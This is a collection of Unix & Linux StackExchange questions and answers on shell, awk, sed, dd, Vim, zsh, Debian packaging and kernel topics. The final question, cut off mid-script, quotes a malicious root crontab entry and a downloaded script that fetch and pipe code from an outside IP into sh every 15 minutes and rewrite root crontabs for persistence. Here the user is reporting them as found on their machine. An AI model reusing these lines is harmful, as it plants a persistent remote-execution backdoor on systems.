543,256
I have the following data set, named a.txt, with 9003 rows:

571 43544000424023503222
572 43504442020202303202
573 40340440323043033204
574 40303445340343505242
...
16078 50200000023322000202
16079 33233500320452300252
16080 04200330233532050502
16081 30200400323435434202

I want to get a data file with the values in the first column right-aligned, the second column beginning in the same position on all rows, and one space between the first and second columns, like this:

  571 43544000424023503222
  572 43504442020202303202
  573 40340440323043033204
  574 40303445340343505242
...
16078 50200000023322000202
16079 33233500320452300252
16080 04200330233532050502
16081 30200400323435434202

I am trying this code:

awk '{printf "%-5s \n", $1,$2}' a.txt |  # -5 indicates the maximum number of characters in the first column
expand > b.txt

The second column begins in the right place; however, the first column is left-aligned in the output, as below:

571   43544000424023503222
572   43504442020202303202
573   40340440323043033204
574   40303445340343505242
...
16078 50200000023322000202
16079 33233500320452300252
16080 04200330233532050502
16081 30200400323435434202

Can you help me with this? Thanks in advance.
You don't need the - flag (it means left-align); the default alignment is right-align:

awk '{printf "%5s %s\n",$1,$2}' a.txt
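If the width of the first column isn't known in advance, a two-pass sketch can measure it first (this assumes a.txt can be read twice; the width is spliced into the format string by awk's string concatenation):

awk 'NR==FNR { if (length($1) > w) w = length($1); next }
     { printf "%" w "s %s\n", $1, $2 }' a.txt a.txt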
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543256", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/362318/" ] }
543,291
A few days ago I learned that I can use

"\ej": history-search-backward
"\ek": history-search-forward

to avoid the arrow keys. That works like a charm, and I began to read the bash docs to learn more about .inputrc. Please have a look at this page (especially the part about key bindings): https://www.gnu.org/software/bash/manual/html_node/Readline-Init-File-Syntax.html#Readline-Init-File-Syntax — \e is only described as "an escape character". While English is not my first language, I would never have assumed this could be used to map Alt. That's an ongoing theme for me with documentation: it often feels more exemplary than explanatory. The question is: where is this stuff actually written down, so that others could have known about it and given the tip in the first place?
The mapping of the Alt key to Escape (ASCII 033, "\e") is done by your terminal emulator; the readline library (which handles ~/.inputrc) has no part in it.

The problem is that there is no way to send actual key events to a program running in a terminal; the terminal will convert them into sequences of bytes which the program can read from the tty. For the Alt/Meta key, there are two ways to do it:

1. Map it to Escape (ASCII 033 / 0x1b) -- pressing Alt-K will actually send "\ek", Alt-Shift-K "\eK", etc. This is the default in most terminal emulators, but it's usually configurable, and you have every reason to make it the default if it isn't already.

2. Turn on the high (eighth) bit of the ASCII value of the key -- pressing Alt-K will actually send the 0x6b | 0x80 = 0xeb byte, 0x6b being the ASCII value of "k". It's this latter form which is recognized as "\M-k" in readline bindings.

The second method does not work and is horribly broken with any multibyte locale like en_US.UTF-8 (which is the default on most modern systems). On such systems, the terminal emulator may not send the raw 0xeb byte (which is not a valid UTF-8 sequence, but binary garbage); it may instead convert it from ISO-8859-1 to UTF-8, resulting in "\xc3\xab" = "ë" (e with diaeresis) being sent when Alt-K is pressed. But readline doesn't know how to map "ë" back to "\M-k", no matter how much you fiddle with the plethora of options like convert-meta, enable-meta-key, input-meta, etc. And even if you could do it, that would still be broken, because people may actually want to type "ë" and "ó" and will not appreciate those being handled as unrelated keys like Alt-K and Alt-S.
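Putting this together with the bindings from the question, a minimal ~/.inputrc that relies on the terminal sending ESC for Alt (the first, default method above) would be:

"\ej": history-search-backward
"\ek": history-search-forward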
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543291", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/358708/" ] }
543,451
I want to add ; at the end of certain lines in a txt file containing DDL for multiple tables. For example:

LOCATION: 'hdfs://HDP**/apps/hive/warehouse/bps_uat.db/maaa'

As per the above, I need to add ; at the end of all such lines.
In addition to Freddy's answer, you can use the :global command. For example:

:g/maaa/norm A;

Which means:

:g/        " On each line matching this regex:
maaa       "   'maaa'
norm A;    " Run 'A;' as if I had manually typed it

You'll have to adjust 'maaa' to whatever you need, since it's not clear from your question which lines you want to apply this to. :g/hdfs/norm A; for example will append a semicolon to any line containing the text "hdfs".
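If the edit needs to be scripted outside of Vim, a hedged equivalent with GNU sed, editing in place (the /hdfs/ address and the file name tables.ddl are assumptions to adjust):

sed -i '/hdfs/ s/$/;/' tables.ddl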
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543451", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/374111/" ] }
543,462
We have Red Hat servers (7.2). The following sar invocation prints all the relevant details:

sar -p -d 1 1

07:16:35 PM DEV tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util
07:16:36 PM sda 13.00 0.00 120.00 9.23 0.04 3.08 1.38 1.80
07:16:36 PM vg_livecd-lv_root 15.00 0.00 120.00 8.00 0.05 3.07 1.27 1.90
07:16:36 PM vg_livecd-lv_swap 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00
07:16:36 PM vg_livecd-lv_home 0.00 0.00 0.00 0.00 0.00 0.00

We now want to add the hostname of the machine at the beginning of each line. First we get the hostname:

hostname=`hostname`
echo $hostname
server_mng14

Expected results:

sar -p -d 1 1

server_mng14 07:16:35 PM DEV tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util
server_mng14 07:16:36 PM sda 13.00 0.00 120.00 9.23 0.04 3.08 1.38 1.80
server_mng14 07:16:36 PM vg_livecd-lv_root 15.00 0.00 120.00 8.00 0.05 3.07 1.27 1.90
server_mng14 07:16:36 PM vg_livecd-lv_swap 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00
server_mng14 07:16:36 PM vg_livecd-lv_home 0.00 0.00 0.00 0.00 0.00 0.00

What do we need to pipe after sar -p -d 1 1 in order to get the hostname at the beginning of each line?
You could run: sar -p -d 1 1 | sed "s/^/$(hostname) /"
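If sar is left running continuously (e.g. sar -p -d 1 without a count), GNU sed's -u (unbuffered) flag keeps the annotated lines appearing in real time instead of in buffered chunks (a sketch assuming GNU sed):

sar -p -d 1 | sed -u "s/^/$(hostname) /"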
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543462", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/237298/" ] }
543,541
I frequently want to do something like this: cat file | command > file (which obviously doesn't work). The only solution I've seen for this is sponge , i.e. cat file | command | sponge file Unfortunately, sponge is not available to me (nor can I install it or any other package). Is there a more standard quick way to do this without having to break it up every time into multiple commands (pipe to temp file, pipe back to original, delete temp file)? I tried tee for example, and it seems to work, but is it a consistent/safe solution?
A shell function replacing sponge:

mysponge () (
    append=false

    while getopts 'a' opt; do
        case $opt in
            a) append=true ;;
            *) echo error; exit 1
        esac
    done
    shift "$(( OPTIND - 1 ))"

    outfile=$1

    tmpfile=$(mktemp "$(dirname "$outfile")/tmp-sponge.XXXXXXXX") &&
    cat >"$tmpfile" &&
    if "$append"; then
        cat "$tmpfile" >>"$outfile"
    else
        if [ -f "$outfile" ]; then
            chmod --reference="$outfile" "$tmpfile"
        fi
        if [ -f "$outfile" ]; then
            mv "$tmpfile" "$outfile"
        elif [ -n "$outfile" ] && [ ! -e "$outfile" ]; then
            cat "$tmpfile" >"$outfile"
        else
            cat "$tmpfile"
        fi
    fi &&
    rm -f "$tmpfile"
)

This mysponge shell function passes all data available on standard input on to a temporary file. When all data has been redirected to the temporary file, the collected data is copied to the file named by the function's argument.

If data is not to be appended to the file (i.e. -a is not used) and the given output filename refers to an existing regular file, an attempt is first made to transfer that file's modes to the temporary file using GNU chmod, and the temporary file is then moved into place with mv. If the output is to something that is not a regular file (a named pipe, standard output, etc.), the data is output with cat. If no file was given on the command line, the collected data is sent to standard output. At the end, the temporary file is removed.

Each step in the function relies on the successful completion of the previous step. No attempt is made to remove the temporary file if one command fails (it may contain important data). If the named file does not exist, it will be created with the user's default permissions etc., and the data arriving from standard input will be written to it. The mktemp utility is not standard, but it is commonly available. The above function mimics the behaviour described in the manual for sponge from the moreutils package on Debian.

Using tee in place of sponge would not be a viable option. You say that you've tried it and it seemed to work for you. It may work and it may not. It relies on the timing of when the commands in the pipeline are started (they are started pretty much concurrently), and on the size of the input data file. The following is an example showing a situation where using tee would not work. The original file is 200000 bytes, but after the pipeline, it's truncated to 32 KiB (which could well correspond to some buffer size on my system).

$ yes | head -n 100000 >hello
$ ls -l hello
-rw-r--r--  1 kk  wheel  200000 Jan 10 09:45 hello
$ cat hello | tee hello >/dev/null
$ ls -l hello
-rw-r--r--  1 kk  wheel  32768 Jan 10 09:46 hello
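Usage then mirrors sponge (a sketch; config.txt and log.txt are placeholder names):

# rewrite a file with a filtered version of itself
grep -v '^#' config.txt | mysponge config.txt

# append the output of a pipeline to a file
date | mysponge -a log.txt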
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543541", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/286431/" ] }
543,576
I am trying to modprobe wireguard as root, and it fails with:

modprobe: ERROR: could not insert 'wireguard': Operation not permitted

Going more verbose, I get one more line:

[root@localhost ben]# insmod /lib/modules/5.2.11-100.fc29.x86_64/extra/wireguard.ko.xz
insmod: ERROR: could not insert module /lib/modules/5.2.11-100.fc29.x86_64/extra/wireguard.ko.xz: Operation not permitted

dkms runs fine without error. I've also disabled SELinux and that made no difference. I don't see anything in the journalctl logs. Looking through man pages and Google has not turned anything up. I did find this helpful line in dmesg:

Lockdown: modprobe: Loading of unsigned module is restricted; see man kernel_lockdown.7

However, that man page does not exist. How can I debug this? Any pointers on where to go next?
Finally found something on it. It appears to be a "feature" where unsigned code can't be loaded into the kernel when UEFI Secure Boot is enabled (which it is). To get the module loading, disable kernel lockdown via sysrq:

# echo 1 > /proc/sys/kernel/sysrq
# echo x > /proc/sysrq-trigger

Then modprobe should work:

modprobe wireguard

For more information, see:
https://mjg59.dreamwidth.org/50577.html
https://bugzilla.redhat.com/show_bug.cgi?id=1599197
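To first confirm that Secure Boot is indeed what triggers lockdown on the machine, a quick check (assuming the mokutil package is installed, as it is on Fedora by default):

mokutil --sb-state
# prints "SecureBoot enabled" when the lockdown behaviour applies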
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/543576", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34855/" ] }
543,601
After running the command below, I got an error:

# apt-get install linux-headers-$(uname -r)
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package linux-headers-4.9.0-3-amd64
E: Couldn't find any package by glob 'linux-headers-4.9.0-3-amd64'
E: Couldn't find any package by regex 'linux-headers-4.9.0-3-amd64'

To troubleshoot, I checked the following:

# apt-cache search linux-headers
aufs-dkms - DKMS files to build and install aufs
linux-libc-dev-arm64-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-armel-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-armhf-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-mips-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-mips64el-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-mipsel-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-ppc64el-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-s390x-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-alpha-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-hppa-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-m68k-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-mips64-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-powerpc-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-powerpcspe-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-ppc64-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-sh4-cross - Linux Kernel Headers for development (for cross-compiling)
linux-libc-dev-sparc64-cross - Linux Kernel Headers for development (for cross-compiling)
linux-headers-4.9.0-11-all - All header files for Linux 4.9 (meta-package)
linux-headers-4.9.0-11-all-amd64 - All header files for Linux 4.9 (meta-package)
linux-headers-4.9.0-11-amd64 - Header files for Linux 4.9.0-11-amd64
linux-headers-4.9.0-11-common - Common header files for Linux 4.9.0-11
linux-headers-4.9.0-11-common-rt - Common header files for Linux 4.9.0-11-rt
linux-headers-4.9.0-11-rt-amd64 - Header files for Linux 4.9.0-11-rt-amd64
linux-headers-amd64 - Header files for Linux amd64 configuration (meta-package)
linux-headers-rt-amd64 - Header files for Linux rt-amd64 configuration (meta-package)

and

# apt-cache search linux-image
linux-headers-4.9.0-11-amd64 - Header files for Linux 4.9.0-11-amd64
linux-headers-4.9.0-11-rt-amd64 - Header files for Linux 4.9.0-11-rt-amd64
linux-image-4.9.0-11-amd64 - Linux 4.9 for 64-bit PCs
linux-image-4.9.0-11-amd64-dbg - Debug symbols for linux-image-4.9.0-11-amd64
linux-image-4.9.0-11-rt-amd64 - Linux 4.9 for 64-bit PCs, PREEMPT_RT
linux-image-4.9.0-11-rt-amd64-dbg - Debug symbols for linux-image-4.9.0-11-rt-amd64
linux-image-amd64 - Linux for 64-bit PCs (meta-package)
linux-image-amd64-dbg - Debugging symbols for Linux amd64 configuration (meta-package)
linux-image-rt-amd64 - Linux for 64-bit PCs (meta-package), PREEMPT_RT
linux-image-rt-amd64-dbg - Debugging symbols for Linux rt-amd64 configuration (meta-package)
linux-image-4.9.0-3-amd64 - Linux 4.9 for 64-bit PCs

After running apt-cache search linux-image I do see the linux-image-4.9.0-3-amd64 kernel version that I want; I would like the matching headers to appear in the results of the apt-cache search linux-headers command as well.
A few people suggested changing sources.list and then trying again. But as I am new to this, I have no idea how to find a proper entry for sources.list or what would be best suited to resolve my problem. I searched on Google but did not find a solution. Any link or solution would be of great help.
For apt-get install linux-headers-$(uname -r) to work, you need to be running a kernel which is still available from the distribution repositories; in most cases, this basically means you need to be running the latest supported kernel for your distribution. On Debian, the simplest option is

apt-get update
apt-get install linux-image-amd64 linux-headers-amd64

(adjust to your architecture) to get the current kernel and matching headers, then reboot.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/543601", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/264177/" ] }
543,614
In the dd command, we can use skip to skip n bytes in a file; everything from the nth byte to the end of the file is then copied. But I want to copy binary data from byte 1228 to byte 1331 only. How do I achieve this with dd on Linux?
Use count to specify the number of blocks to copy, and use the shell to do the calculation. With ibs=1, the input block size is one byte, so both skip and count are specified in bytes:

dd ibs=1 skip=1228 count=$((1331-1228+1))

As 1228 and 1331-1228+1 are both multiples of 4, it would be possible to set the input block size to 4, which would make things more efficient; but unless this is going to be run an enormous number of times, the optimization will be lost in the noise. Other things, like pre-calculating the result of 1331-1228+1, should be done first.

dd ibs=4 skip=$((1228/4)) count=$(((1331-1228+1)/4))
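With GNU dd specifically, the same byte-exact extraction works without shrinking the block size, because skip and count can be interpreted as byte counts via iflag (a GNU extension; the file names here are placeholders):

dd if=input.bin of=output.bin bs=64k skip=1228 count=$((1331-1228+1)) iflag=skip_bytes,count_bytes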
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/543614", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/367539/" ] }
543,792
In the bash shell, we can define a function f with f(){ echo Hello; } and then redeclare/override it, without any error or warning messages, with f(){ echo Bye; } I believe there is a way to protect functions from being overridden in this way.
You may declare a function foo as a read-only function using readonly -f foo or declare -g -r -f foo (readonly is equivalent to declare -g -r). It's the -f option to these built-in utilities that makes them act on foo as the name of a function, rather than on the variable foo.

$ foo () { echo Hello; }
$ readonly -f foo
$ foo () { echo Bye; }
bash: foo: readonly function
$ unset -f foo
bash: unset: foo: cannot unset: readonly function
$ foo
Hello

As you can see, making the function read-only not only protects it from getting overridden, but also protects it from being unset (removed completely). Currently (as of bash-5.0.11), trying to modify a read-only function does not terminate the shell if one is using the errexit shell option (set -e). Chet, the bash maintainer, says that this is an oversight and that it will be changed in the next release. Update: This was fixed during October 2019 for bash-5.1-alpha, so any bash release 5.1 or later will exit properly if an attempt to modify a read-only function is made while the errexit shell option is active.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/543792", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/156608/" ] }
544,299
I am going to parse this data in googleapis.txt:

bucket,abc-def-ghi-45gjd4-wwxis
bucket,dde-wwq-ooi-66ciow-po22q
instance,jkl-mno-1-zzz-68dkakw-oo9w8
disk,pqr-stu-10-kuy-l2oxapw-rp4lt

I expect a result like this:

bucket,abc-def-ghi
bucket,dde-wwq-ooi
instance,jkl-mno-1-zzz
disk,pqr-stu-10-kuy

I am thinking that I have to change - to a space and then run this command:

cat googleapis.txt | awk '{$NF="";sub(/[ \t]+$/,"")}1' | awk '{$NF="";sub(/[ \t]+$/,"")}1'

I got that from https://stackoverflow.com/a/27794421/8162936 . After parsing, I would change the spaces back to hyphens. Does anyone know the best practice or a one-liner shell command to parse it? Thanks all.
With sed you can do:

sed -E 's/(-[^-]*){2}$//' infile

This matches a pattern like -anything twice ((...){2}) at the end ($) of every line and removes it.
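An alternative with GNU awk, which rebuilds the record when NF is decremented (a sketch; shrinking NF this way is implementation-specific, so verify on your awk):

awk 'BEGIN { FS = OFS = "-" } { NF -= 2 } 1' infile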
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544299", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/273477/" ] }
544,373
I'm looking for the zsh equivalent of the bash command history -c; in other words, clear the history for the current session. In zsh, history -c returns 1 with the error message history: bad option: -c. Just to clarify, I'm not looking for a way to delete the contents of $HISTFILE; I just want a command to reset the history to the same state it was in when I opened the terminal. Deleting the contents of $HISTFILE does the opposite of what I want: it deletes the history I want to preserve and preserves the history I want to delete (since the current session's history gets appended to it, regardless of whether its contents were previously erased). There is a workaround I use for now, but it's obviously less than ideal: in the current session I set HISTFILE=/dev/null and just close and reopen the terminal. This causes the history of the closed session not to be appended to $HISTFILE. However, I'd really like something like history -c from bash, which is much more elegant than having to close and restart the terminal.
To get an empty history, temporarily set HISTSIZE to zero.

function erase_history { local HISTSIZE=0; }
erase_history

If you want to erase the new history from this shell instance but keep the old history that was loaded initially, empty the history as above, then reload the saved history with fc -R afterwards. If you don't want the erase_history call to be recorded in the history, you can filter it out in the zshaddhistory hook:

function zshaddhistory_erase_history {
  [[ $1 != [[:space:]]#erase_history[[:space:]]# ]]
}
zshaddhistory_functions+=(zshaddhistory_erase_history)

Deleting one specific history element (history -d NUM in bash) is another matter. I don't think there's a way other than:

1. Save the history: fc -AI to append to the history file, or fc -WI to overwrite the history file, depending on your history sharing preferences.
2. Edit the history file ($HISTFILE).
3. Reload the history file: fc -R.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/544373", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/325952/" ] }
544,428
I've noticed a lot of questions and answers and comments expressing disdain for (and sometimes even fear of) writing scripts instead of one-liners. So, I'd like to know: When and why should I write a stand-alone script rather than a "one-liner"? Or vice-versa? What are the use-cases and pros & cons of both? Are some languages (e.g. awk or perl) better suited to one-liners than others (e.g. python)? If so, why? Is it just a matter of personal preference or are there good (i.e. objective) reasons to write one or the other in particular circumstances? What are those reasons? Definitions one-liner : any sequence of commands typed or pasted directly into a shell command-line . Often involving pipelines and/or use of languages such as sed , awk , perl , and/or tools like grep or cut or sort . It is the direct execution on the command-line that is the defining characteristic - the length and formatting is irrelevant. A "one-liner" may be all on one line, or it may have multiple lines (e.g. sh for loop, or embedded awk or sed code, with line-feeds and indentation to improve readability). script : any sequence of commands in any interpreted language(s) which are saved into a file , and then executed. A script may be written entirely in one language, or it may be a shell-script wrapper around multiple "one-liners" using other languages. I have my own answer (which I'll post later), but I want this to become a canonical Q&A on the subject, not just my personal opinion.
Another response based on practical experience.

I would use a one-liner if it was "throw away" code that I could write straight at the prompt. For example, I might use this:

for h in host1 host2 host3; do printf "%s\t%s\n" "$h" "$(ssh "$h" uptime)"; done

I would use a script if I decided that the code was worth saving. At this point I would add a description at the top of the file, probably add some error checking, and maybe even check it into a code repository for versioning. For example, if I decided that checking the uptime of a set of servers was a useful function that I would use again and again, the one-liner above might be expanded to this:

#!/bin/bash
# Check the uptime for each of the known set of hosts
#########################################################################
hosts=(host1 host2 host3)

for h in "${hosts[@]}"
do
    printf "%s\t" "$h"
    uptime=$(ssh -o ConnectTimeout=5 -n "$h" uptime 2>/dev/null)
    printf "%s\n" "${uptime:-(unreachable)}"
done

Generalising, one could say:

One-liner
- Simple code (i.e. just "a few" statements), written for a specific one-off purpose
- Code that can be written quickly and easily whenever it is needed
- Disposable code

Script
- Code that will (probably) be used more than once or twice
- Complex code requiring more than "a few" statements
- Code that will need to be maintained by others
- Code to be understood by others
- Code to be run unattended (for example, from cron)

I see a fair number of the questions here on unix.SE ask for a one-liner to perform a particular task. Using my examples above, I think that the second is far more understandable than the first, and therefore readers can learn more from it. One solution can be easily derived from the other, so in the interests of readability (for future readers) we should probably avoid providing code squeezed into one line for anything other than the most trivial of solutions.
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/544428", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/7696/" ] }
544,432
Scenario: In version controlled system configuration based on Puppet, Chef etc., it is required to reproduce a certain system state. This is done by explicitly specifying system package versions. Recently we ran into a problem where certain package versions were missing in the Debian repositories. One example: The "patch" package was required in version 2.7.5-1+deb9u1, but only 2.7.5-1+deb9u2 was available. Another, even more severe example: "linux-headers-4.9.0-9-common" is required (due to the associated kernel being installed) and only "linux-headers-4.9.0-11-common" is available. This makes it impossible to reproduce a certain state of a system. The above packages are just examples (which I in fact encountered). I am interested in understanding and solving the general problem. What is the idea behind these updates, 'vanishing' packages and package versions? Where can I get previous versions (not really old versions, but versions that are a couple of weeks old) of Debian packages? It should be possible to automate the installation process in general way.
Being able to reproduce a specific setup, down to the exact version, is your requirement, not Debian’s. Debian only supports a single version of each binary package in any given release; the counterpart of that is that great care is taken to ensure that package updates in any given release don’t introduce regressions, and when such care isn’t possible, to document that fact. Keeping multiple versions of a given package would only increase the support burden and the test requirements: for example, package maintainers would have to test updated packages against all available versions of the libraries they use, instead of only the currently-supported versions... Packages are only updated in a stable release when really necessary, i.e. to fix a serious bug (including security issues). In the kernel’s case, this sometimes means that the kernel ABI changes, and the package name changes as a result of that (to force rebuilds of dependent packages); there are meta-packages which you can pull in instead of hard-coding the ABI ( linux-image-amd64 , linux-headers-amd64 , etc.). There is however a workaround for your situation: every published source and binary package is archived on snapshot.debian.org . When you create a versioned setup, you can pick the corresponding snapshot (for example, one of the September 2019 snapshots ) and use that as your repository URL: deb https://snapshot.debian.org/archive/debian/20190930T084755Z/ buster main If you end up relying on this, please use a caching mirror of some sort, for example Apt-Cacher NG . This will not only reduce the load on the snapshot server, it will ensure that you have a local copy of all the packages you need. (The situation with regards to source packages is slightly more complex, and the archives do carry multiple versions of some source packages in a given release, because of licensing dependencies. But that’s not relevant here. Strictly speaking, Debian does provide multiple versions of some binaries in supported releases: the current version in the current point release, along with any updates in the security repositories and update repositories; the latter are folded in at the next point release. So maintaining a reproducible, version-controlled system configuration is feasible without resorting to snapshots, as long as you update it every time a point release is made.)
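One practical note when pointing apt at snapshot.debian.org: the archived Release files are past their Valid-Until date, so apt may refuse to update unless validity checking is relaxed (an option worth verifying against your apt version):

deb [check-valid-until=no] https://snapshot.debian.org/archive/debian/20190930T084755Z/ buster main

# or equivalently on the command line:
apt-get -o Acquire::Check-Valid-Until=false update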
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/544432", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/332954/" ] }
544,594
I have a file (search.patterns) with a list of patterns to be searched for in a list of other txt files.

search.patterns:

home
dog
cat

file 1.txt:

home 3
tiger 4
lion 1

file 2.txt:

dolphin 6
jaguar 3
dog 1

file 3.txt:

donkey 3
cat 4
horse 1

I want the first line of the pattern file to be searched in file 1, the second line searched in file 2, and the third line in file 3.

Output:

home 3
dog 1
cat 4

I have written some code like this:

for f in *.txt; do
    while IFS= read -r LINE; do
        grep -f "$LINE" "$f" > "$f.out"
    done < search.patterns
done

However, the output files are empty. Any help highly appreciated, thanks.
Using bash:

#!/bin/bash

files=( 'file 1.txt' 'file 2.txt' 'file 3.txt' )

while IFS= read -r pattern; do
    grep -e "$pattern" "${files[0]}"
    files=( "${files[@]:1}" )
done <search.patterns

Testing it:

$ bash script.sh
home 3
dog 1
cat 4

The script saves the relevant filenames in the files array, and then proceeds to read patterns from the search.patterns file. For each pattern, the first file in the files list is queried. The processed file is then deleted from the files list (yielding a new first filename in the list). If the number of patterns exceeds the number of files in files, there will be errors from grep. A variant that instead pairs patterns and files by index is sketched below.
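For reference, that index-pairing variant, reading all patterns up front with mapfile (bash 4+; it assumes there are at least as many files as patterns):

#!/bin/bash

files=( 'file 1.txt' 'file 2.txt' 'file 3.txt' )
mapfile -t patterns <search.patterns

for i in "${!patterns[@]}"; do
    grep -e "${patterns[i]}" "${files[i]}"
done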
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544594", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/361114/" ] }
544,635
I'm looking for a file system that stores files by block content, so that identical blocks in similar files are stored only once. This is for backup purposes. It is similar to what block-level backup storage tools such as zbackup propose, but I'd like a Linux file system that does this transparently.
Assuming your question is about data deduplication, there are a few file systems which support that on Linux: ZFS , with online deduplication (so data is deduplicated as it is stored), but with extreme memory requirements which make the feature hard to use in practice; Btrfs , with “only” out-of-band deduplication , albeit with tightly-integrated processes which provide reasonably quick deduplication after data is stored; SquashFS , but that probably doesn’t fit your requirements because it’s read-only. XFS is supposed to get deduplication at some point, and Btrfs is also supposed to get online deduplication. Keep an eye on Wikipedia’s file system comparison to see when this changes.
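For Btrfs, the out-of-band deduplication is typically driven from userspace; one common tool is duperemove (a sketch, assuming the duperemove package is installed; -d submits the actual deduplication requests, -r recurses):

duperemove -dr /path/to/backups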
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544635", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/316157/" ] }
544,657
I'm connecting to my remote SSH Debian server account with no root privileges. Is there a way to change/set the time from the server's local time (US) to my local time (Poland; Central European Summer Time, GMT+2)?
Yes, in a general way you can use: $ tzselect At the end of the selection it will tell you how to make the change permanent for the session, and for all future sessions. In your case this might be enough: $ TZ='Europe/Warsaw'; export TZ then check with date . If you add that line to .profile you should make that change permanent for your user.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544657", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378796/" ] }
544,671
I've already posted this to the Super User exchange, but was told I might find an answer faster here. I'm attempting to add a feature to an application to keep the screen awake while the user is logged in. The reason for this is that I recently implemented touchscreen functionality to allow the user to control the UI through a touchscreen. However, because we have an out-of-date Linux kernel, we have limited touchscreen functionality -- meaning that although the kernel has multitouch events defined, Xorg doesn't respond to touch at all. So I wrote a driver in the background of our Qt4 application to read touch events directly from /dev/input and to generate mouse events in the application. However, because these mouse events are not on a system level and are contained within the Qt application, they do not keep the screen awake or wake it once the screensaver starts. The goal of the touchscreen is to remove the need for a keyboard and mouse on our product, and not being able to wake the screensaver would make it rather difficult to use. The application already has a QTimer set up that fires every 60 seconds (in case some system process changes these settings while the application is being run) to "prevent the screensaver", but after looking at the command it was issuing, it's obvious why it doesn't work, because the command it was using is:

xset s on

So I changed the timer to instead issue the following commands:

xset s off
xset s noblank
xset -dpms

I also tried executing this command to attempt to prevent xdg-screensaver from launching:

xwininfo -name "plasma-desktop" | grep "plasma" | cut -d' ' -f4 | xdg-screensaver suspend

However, even with these changes, the screensaver eventually appears. Are there other settings I need to disable to prevent this? Assuming the screensaver that's appearing is the result of the OS launching xdg-screensaver, is there a way I could prevent the launching of that application while our application is logged in? Or is there some other way I should go about this? If it matters, we are running Scientific Linux 6.4 (kernel 2.6.32-754). EDIT: Forgot to mention, the desktop environment is KDE4. EDIT: I found a KSS file matching the screensaver that shows up. I tried renaming it, but that just resulted in a blank screensaver showing up in its place. I need to know how to disable the service that is launching it.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544671", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/161697/" ] }
544,690
Just out of curiosity, I am interested in compiling the Linux kernel with both the clang and zapcc compilers, one at a time. I can't find a guide to follow; only GCC is normally used to compile the Linux kernel. How do I compile the Linux kernel with other compilers?
The kernel build allows you to specify the tools you want to use; for example, to specify the C compiler, set the CC and HOSTCC variables:

make CC=clang HOSTCC=clang

The build is only expected to succeed with GCC, but there are people interested in using Clang instead, and it is known to work in some circumstances (some Android kernels are built with Clang).
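Newer kernel trees also accept a single switch that selects the whole LLVM toolchain (compiler, linker, binutils replacements); whether it is available depends on your kernel version, so treat this as an assumption to verify:

make LLVM=1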
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/544690", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/274717/" ] }
544,811
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me; searching for parts of it on Google turned up nothing.

Crontab entry:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

The contents of http://103.219.112.66:8000/i.sh are:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
